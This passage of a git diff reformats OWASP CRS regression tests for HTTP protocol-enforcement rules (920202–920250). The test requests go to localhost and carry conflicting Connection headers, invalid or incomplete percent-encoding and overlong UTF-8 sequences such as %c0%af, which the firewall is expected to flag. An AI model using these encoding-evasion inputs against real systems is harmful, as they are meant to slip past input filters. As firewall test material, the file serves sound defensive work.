127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log_contains: id "920202" + - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log_contains: id "920202" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index 4e7f952d6..b6d914fb9 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -1,122 +1,114 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920210.yaml" description: "Tests that trigger rule 920210" +rule_id: 920210 tests: - - test_title: 920210-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920210\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "close,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "close,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "User-Agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "User-Agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920210\"" + - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive, keep-alive - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" - - test_title: 920210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive, keep-alive + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920210" + - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close, close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close, close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920210" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 1ef7bba65..39401c384 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -1,129 +1,120 @@ --- meta: author: "csanders-git, Max Leske, azurit" - enabled: true - name: "920220.yaml" description: "Detect invalid URI encoding in the request URI" +rule_id: 920220 tests: - - test_title: 920220-1 + - test_id: 1 description: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 2 description: Detect invalid URI encoding in decoded URI (`%1G`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%251G" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%251G" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 3 description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "get/?x=xyz%20zyx" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "get/?x=xyz%20zyx" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 4 description: Do not trigger for spaces encoded as `+`, which is valid stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?test=This+is+a+test" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=This+is+a+test" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 5 description: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%6%78%79" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%6%78%79" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 6 description: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%62%61%64%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%62%61%64%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 7 description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 8 description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt?x%20y" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt?x%20y" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 54515ef4b..423422384 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml @@ -1,37 +1,34 @@ --- meta: author: "Max Leske, azurit" - enabled: true - name: "920221.yaml" description: "Detect invalid URI encoding in the last path segment of the URI" +rule_id: 920221 tests: - - test_title: 920221-1 + - test_id: 1 description: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920221\"" - - test_title: 920221-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920221\"" + - test_id: 2 description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/%25w20.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920221\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/%25w20.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920221\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 0c985df20..8b00df53d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml @@ -1,43 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920230.yaml" description: "Description" +rule_id: 920230 tests: - # From old modsec regression tests - test_title: 920230-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920230\"" - # From old modsec regression tests - test_title: 920230-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?parm=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920230\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 9661f48a0..5197bca9a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml @@ -1,135 +1,128 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920240.yaml" description: "Description" +rule_id: 920240 tests: - - test_title: 920240-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 11 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %w20$" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" - - test_title: 920240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 11 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %w20$" + stop_magic: true + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: 10 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "x=new %20$" - stop_magic: true - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" - - test_title: 920240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: 10 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "x=new %20$" + stop_magic: true + version: "HTTP/1.1" + output: + no_log_contains: "id \"920240\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: "param=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: "param=value" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920240\"" - # We have a valid percent encoding here - test_title: 920240-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "text/xml" - uri: "/" - data: | - - - - http://www.w3.org/2002/03/xkms#Pending - %1Gwww.attack.org - - - - version: "HTTP/1.1" - output: - no_log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "text/xml" + uri: "/" + data: | + + + + http://www.w3.org/2002/03/xkms#Pending + %1Gwww.attack.org + + + + version: "HTTP/1.1" + output: + no_log_contains: "id \"920240\"" - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "9" - uri: "/" - data: "param=%1G" - stop_magic: true - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "9" + uri: "/" + data: "param=%1G" + stop_magic: true + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" - # test URL Encoding Abuse Attack Attempt from old regression tests - test_title: 920240-6 + test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - Content-Type: "application/x-www-form-urlencoded" - uri: "/" - data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" - version: "HTTP/1.1" - output: - log_contains: "id \"920240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + Content-Type: "application/x-www-form-urlencoded" + uri: "/" + data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" + version: "HTTP/1.1" + output: + log_contains: "id \"920240\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index 0f75ddbc8..f56ff48c6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml @@ -1,80 +1,75 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920250.yaml" description: "Description" +rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set # Taken from existing modsec regression - test_title: 920250-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0%af" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0%af" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" - # Taken from existing modsec regression - test_title: 920250-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%c0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%c0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" - # Taken from existing modsec regression - test_title: 920250-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%F5%80%BF%BF" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" - - test_title: 920250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%F5%80%BF%BF" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" + - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=%E2%A3" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 